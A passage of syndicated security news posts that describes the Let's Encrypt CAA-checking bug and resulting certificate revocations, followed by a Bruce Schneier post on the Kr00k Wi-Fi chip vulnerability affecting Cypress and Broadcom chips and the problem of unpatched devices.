The bug LE discovered is that, rather than checking each domain name separately for valid CAA records authorizing that domain to be renewed by that server, Boulder would check a single one of the domains on that server n times (where n is the number of LE-serviced domains on that server). Let’s Encrypt typically considers domain validation results good for 30 days from the time of validation–but CAA records specifically must be checked no more than eight hours prior to certificate issuance.

The upshot is that a 30-day window is presented in which certificates might be issued to a particular Web server by Let’s Encrypt despite the presence of CAA records in DNS that would prohibit that issuance.

Since Let’s Encrypt finds itself in the unenviable position of possibly having issued certificates that it should not have, it is revoking all current certificates that might not have had proper CAA record checking on Wednesday, March 4. Users whose certificates are scheduled to be revoked will need to manually force-renewal before then.

And Let’s Encrypt has a blog post about it.

Wi-Fi Chip Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/03/wi-fi_chip_vuln.html

There’s a vulnerability in Wi-Fi hardware that breaks the encryption:

The vulnerability exists in Wi-Fi chips made by Cypress Semiconductor and Broadcom, the latter a chipmaker Cypress acquired in 2016. The affected devices include iPhones, iPads, Macs, Amazon Echos and Kindles, Android devices, and Wi-Fi routers from Asus and Huawei, as well as the Raspberry Pi 3. Eset, the security company that discovered the vulnerability, said the flaw primarily affects Cypress’ and Broadcom’s FullMAC WLAN chips, which are used in billions of devices. Eset has named the vulnerability Kr00k, and it is tracked as CVE-2019-15126.

Manufacturers have made patches available for most or all of the affected devices, but it’s not clear how many devices have installed the patches. Of greatest concern are vulnerable wireless routers, which often go unpatched indefinitely.

That’s the real problem. Many of these devices won’t get patched — ever.